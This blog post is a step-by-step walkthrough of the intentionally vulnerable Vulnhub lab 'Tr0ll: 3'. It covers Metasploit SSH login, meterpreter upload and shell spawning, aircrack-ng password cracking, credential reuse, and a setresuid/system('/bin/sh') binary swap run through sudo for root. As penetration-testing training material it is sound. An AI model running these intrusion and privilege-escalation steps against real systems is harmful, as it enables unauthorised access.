Home Unlabelled Tr0ll: 3 Vulnhub Walkthrough

Tr0ll: 3 Vulnhub Walkthrough

By
Tuesday, August 13, 2019
Read
Add Comment

Today we are going to solve another CTF challenge called “Tr0ll: 3” which is a part of Tr0ll series. It is available on Vulnhub for the purpose of online penetration practices. This lab is not that difficult if we have the proper basic knowledge of Penetration Testing. This credit of making this lab goes to Maleus. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the .ova file from this link. We will be running this lab in a Virtual Machine Player or Virtual Box.  After running the lab, we used the netdiscover command to check the IP Address of the lab. This was found out to be 192.168.1.104.


netdiscover

We are going to start out attack with a port scan. We are going to use the leading scanning tool “nmap”. We will perform an Aggressive scan. After the scan, we can see that the ssh port is opened on the target machine.


nmap -A 192.168.1.104

When we started the lab, we are greeted with a banner as shown in the given image. Here, we have hinted the password. As we can see that after Login, “Start here” is written in the format:


start:here

Usually, login credentials are written in this format.  

So, we fired up Metasploit Framework in our Kali Linux using msfconsole command. To login, we will use Metasploit scanning auxiliary. Here, we selected the auxiliary with the “use” command. After that, we use the “set” command to provide the Target IP Address. Target IP Address is provided with the parameter of rhosts. Here Rhosts means Remote Hosts. After that, we will provide the username and password and exploit. After running we got the meterpreter session. We tried to use the LinEnum script but we couldn’t find anything using it.


msf5> use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.104
msf5 auxiliary(scanner/ssh/ssh_login) > set username start
msf5 auxiliary(scanner/ssh/ssh_login) > set password here
msf5 auxiliary(scanner/ssh/ssh_login) > exploit
meterpreter > cd /tmp
meterpreter > upload /root/LinEnum.sh
meterpreter > shell
python -c 'import pty;pty.spawn("/bin/bash")'
chmod 777 LinEnum.sh
./LinEnum.sh

As LinEnum couldn’t help we tried to enumerate using the find command we extracted all the files with the perm parameter. We specifically wanted those files which have all the permissions. After a bit of enumeration, we found a .cap file and text file. So, we download these files using the download command on the meterpreter.


find / -type f -perm 0777 2>dev/null
meterpreter > cd /var/log/.dist-manage
meterpreter > ls
meterpreter > download wytshadow.cap /root/Desktop
meterpreter > cd /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it
meterpreter > download gold_star.txt /root/Desktop/

As we have the .cap file. It can be opened with Wireshark. After opening the file in Wireshark, we found that all the packets have the Protocol marked as “802.11”. This seems a hint.

Now, we already knew a bit about the 802.11, but those who don’t know, let us tell you it is a protocol that it is a set of LAN protocols and specifies the set of media access control and physical layer protocols for implementing wireless local area network Wi-Fi computer communication.

Now that we know that these are the packets of Wifi traffic, let’s use the aircrack-ng for extracting the password. Using the text file and the capture file as shown in the image given below. The aircrack-ng gave us the password gaUoCe34t1.


aircrack-ng -w gold_star.txt wytshadow.cap

So now that we have the password, let’s upgrade the shell using the su command. We use the name wytshadow which was the same name as the cap file. After successfully logging in, we look around to find a file named ohhfun. It has permission to run as root. With this in mind, we ran the file as shown in the given figure. Here we can see that we have the LYNX name. It is a browser. Maybe it will have to do something further.


su wytshadow
cd
ls -al
./oohfun

Now we used the sudo -l command to find the services we can run as root. We can see that nginx is available for us to run as root. Now, we looked around to find some more clues related to nginx. We traversed into the nginx directory to find the sites-enabled sites. On opening the default file using the cat command. We see that we have the user agent as Lynx. This means websites here will be opened on the lynx browser only.


sudo -l
cd /etc/nginx
ls
cd sites-enabled
ls
cat default

Further, we started the nginx service as shown in the given image. Using the netstat command we can see that we have the port 8080 opened. This was not opened when we attempted the nmap scan.


sudo /usr/sbin/service nginx start
netstat -antp

As discussed earlier, we are going to need a lynx browser. After successfully installing the lynx browser, we are going to open the page associated to port we just opened.


apt install lynx
lynx http://192.168.1.104:8080

8

On opening the link given on the page through lynx, we find these login credentials. That’s was not that difficult. Was it?

Credentials Found:


Username: genphlux
Password:  HF9nd0cr!

As we got the new credentials, we upgraded our shell to the user genphlux user using the su command. After logging in, we looked around to find a file named maleus. We used the file command to find the type of the maleus file as shown in the given image. We opened the file using the cat command to get it on our system.


su genphulx
cd
ls -al
file maleus
cat maleus

Now that we have the private key, we copied it, in a text editor and saved it as “key”. After saving it, we changed its permission using the chmod command. Because a private key doesn’t work with the ALL permission. Now, we logged in using the key as shown in the image given. After successfully logging in, we looked around and found a file named “don’t_even_bother”. We used the file command to find its type, it came out to be ELF 64-bit. After this, we scanned the directory in which we found this file using the ls command and all parameter to see if there are any hidden files. We found “.viminfo” file. It seems interesting.


chmod 600 key
ssh maleus@192.168.1.104 -i key

We used the cat command to inspect the viminfo file. On close inspection, we found a password for another user “B^slc8I$”. This is a good discovery.


cat .viminfo

Now that we have the password, let’s find the command that can run as root. We are going to use the sudo -l command for this. After running the following command, we find that don’t_even_bother file that we found earlier in the file that runs with root permissions. So in order to escalate privilege on this machine, we are going to use this file. Let’s first, empty the contents of this file using echo command as shown in the image given. Now that the file is empty, let’s edit it using nano command.


sudo -l
echo "" > dont_even_bother
nano dont_even_bother.c

Now, after opening this file, we wrote this small script inside which invokes a shell. As this file gets executed as root. The shell will invoke will be of the root as well. After editing, we save this file and exit nano.


int main (void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}

Now, we as it is “.c” file, we will have to compile it using the gcc compiler. We will compile it using the command provided.


gcc dont_even_bother.c -o dont_even_bother
sudo /home/maleus/dont_even_bother
id
cd /root
ls
cat flag.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Tr0ll: 3 Vulnhub Walkthrough appeared first on Hacking Articles.



from Hacking Articles https://ift.tt/2YLFvhE
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us